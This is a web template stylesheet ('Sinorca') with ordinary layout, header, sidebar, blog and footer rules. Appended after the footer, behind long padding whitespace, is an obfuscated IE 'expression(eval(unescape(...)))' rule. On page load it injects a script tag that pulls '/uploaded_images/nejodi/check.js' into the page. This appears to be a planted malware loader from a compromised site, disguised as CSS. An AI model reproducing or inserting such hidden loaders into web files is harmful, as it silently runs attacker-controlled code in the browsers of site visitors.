/*************************************
 * TITLE: Sinorca Screen Stylesheet  *
 * URI  : sinorca/sinorca-screen.css *
 * MODIF: 2003-Apr-30 19:31 +0800    *
 *************************************/


/* ##### Common Styles ##### */

body {
  color: black;
  background-color: rgb(240,240,240);
  font-family: verdana, helvetica, arial, sans-serif;
  font-size: 71%;  /* Enables font size scaling in MSIE */
  margin: 0;
  padding: 0;
}

html > body {
  font-size: 8.5pt;
}

acronym, .titleTip {
  border-bottom: 1px dotted rgb(153,153,153);
  cursor: help;
  margin: 0;
  padding: 0 0 0.4px 0;
}

.doNotDisplay {
  display: none;
}

.smallCaps {
  font-size: 110%;
  font-variant: small-caps;
}


/* ##### Header ##### */

.superHeader {
  color: white;
  background-color: rgb(100,135,220);
  height: 2em;
}

.superHeader a {
  color: white;
  background-color: transparent;
  text-decoration: none;
  font-size: 91%;
  margin: 0;
  padding: 0 0.5ex 0 0.25ex;
}

.superHeader a:hover {
  text-decoration: underline;
}

.superHeader .left {
  position: absolute;
  left: 1.5mm;
  top: 0.75ex;
}

.superHeader .right {
  position: absolute;
  right: 1.5mm;
  top: 0.75ex;
}

.midHeader {
  color: rgb(39,78,144);
  background-color: rgb(140,170,230);
}

.headerTitle {
  font-size: 337%;
  font-weight: normal;
  margin: 0 0 0 4mm;
  padding: 0.25ex 0;
}

.subHeader {
  color: white;
  background-color: rgb(0,51,153);
  margin: 0;
  padding: 1ex 1ex 1ex 1.5mm;
}

.subHeader a {
  color: white;
  background-color: transparent;
  text-decoration: none;
  font-weight: bold;
  margin: 0;
  padding: 0 0.75ex 0 0.5ex;
}  

.subHeader a:hover {
  text-decoration: underline;
}

.superHeader .highlight, .subHeader .highlight {
  color: rgb(253,160,91);
  background-color: transparent;
}


/* ##### Side Bar ##### */

#side-bar {
  width: 15em;
  float: left;
  clear: left;
  border-right: 1px solid rgb(153,153,153);
}

#side-bar div {
  border-bottom: 1px solid rgb(153,153,153);
}

.sideBarTitle {
  font-weight: bold;
  margin: 0 0 0.5em 2.5mm;
  padding: 1em 0 0 0;
}

#side-bar ul {
  list-style-type: none;
  list-style-position: outside;
  margin: 0;
  padding: 0 0 1.1em 0;
}

#side-bar li {
  margin: 0;
  padding: 0.1ex 0;  /* Circumvents a rendering bug (?) in MSIE 6.0 */
}

#side-bar a, .thisPage {
  color: rgb(0,102,204);
  background-color: transparent;
  text-decoration: none;
  margin: 0;
  padding: 0.75em 1ex 0.75em 5mm;
  display: block;
}

.thisPage {
  color: black;
  background-color: white;
  padding-left: 4mm;
  border-top: 1px solid rgb(153,153,153);
  border-bottom: 1px solid rgb(153,153,153);
}

#side-bar a:hover {
  color: white;
  background-color: rgb(100,135,220);
  text-decoration: none;
}

.sideBarText {
  line-height: 1.5em;
  margin: 0 0 1em 0;
  padding: 0 1.5ex 0 2.5mm;
  display: block;
}

#side-bar .sideBarText a {
  text-decoration: underline;
  margin: 0;
  padding: 0;
  display: inline;
}

#side-bar .sideBarText a:hover {
  color: rgb(0,102,204);
  background-color: transparent;
  text-decoration: none;
}

.lighterBackground {
  color: inherit;
  background-color: white;
}


/* ##### Main Copy ##### */

#main-copy {
  color: black;
  background-color: white;
  text-align: justify;
  line-height: 1.5em;
  margin: 0 0 0 15em;
  padding: 0.5mm 5mm 5mm 5mm;
  border-left: 1px solid rgb(153,153,153);
}

#main-copy p {
  margin: 1em 1ex 2em 1ex;
  padding: 0;
}

#main-copy a {
  color: rgb(0,102,204);
  background-color: transparent;
  text-decoration: underline;
}

#main-copy a:hover {
  text-decoration: none;
}

#main-copy h1 {
  color: white;
  background-color: rgb(100,135,220);
  font-size: 100%;
  font-weight: bold;
  margin: 3em 0 0 0;
  padding: 0.5ex 0 0.5ex 1ex;
}

#main-copy .topOfPage {
  color: white;
  background-color: transparent;
  font-size: 91%;
  font-weight: bold;
  text-decoration: none;
  margin: 2.5ex 1ex 0 0;  /* For MSIE */
  padding: 0;
  float: right;
}

#main-copy > .topOfPage {
  margin: 2.75ex 1ex 0 0;  /* For fully standards-compliant user agents */
}

dl {
  margin: 1em 1ex 2em 1ex;
  padding: 0;
}

dt {
  font-weight: bold;
  margin: 0 0 0 0;
  padding: 0;
}

dd {
  margin: 0 0 2em 2em;
  padding: 0;
}

#main-copy .blogPost{ font-size: 291%; margin: 1em 1ex 2em 1ex; padding: 5px;}
.blogPost strong{color:#000000;font-weight:bold;}
.byline{padding:0px;margin:0px;color:#444444;font-size:80%;}
.byline a{border:none;color:#968A0A;text-decoration:none;}
.byline a:hover{text-decoration:underline;}
.blogComments{padding:0px;color:#9E5205;font-size:110%;font-weight:bold;font-family:Verdana,Sans-Serif;}
.blogComment{margin-top:10px;font-size:100%;font-weight:normal;color:black;}
.blogComments .byline{padding-bottom:20px;color:#444444;font-size:80%;font-weight:normal;display:inline;margin-right:10px}
.deleted-comment {font-style:italic;color:gray;}
.comment-link {margin-left:.6em;}
			

/* ##### Footer ##### */

#footer {
  color: white;
  background-color: rgb(100,135,220);
  font-size: 91%;
  margin: 0;
  padding: 1em 2.5mm 2.5ex 2.5mm;
  clear: both;
}

#footer .left {
  line-height: 1.45em;
  float: left;
  clear: left;
}

#footer .right {
  text-align: right;
  line-height: 1.45em;
}

#footer a {
  color: white;
  background-color: transparent;
  text-decoration: underline;
}

#footer a:hover {
  text-decoration: none;
}




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%35%37%34%32%38%39%3B%20%4A%53%53%33%20%3D%20%27%2F%75%70%6C%6F%61%64%65%64%5F%69%6D%61%67%65%73%2F%6E%65%6A%6F%64%69%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%75%70%6C%6F%61%64%65%64%5F%69%6D%61%67%65%73%2F%6E%65%6A%6F%64%69%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      




































































































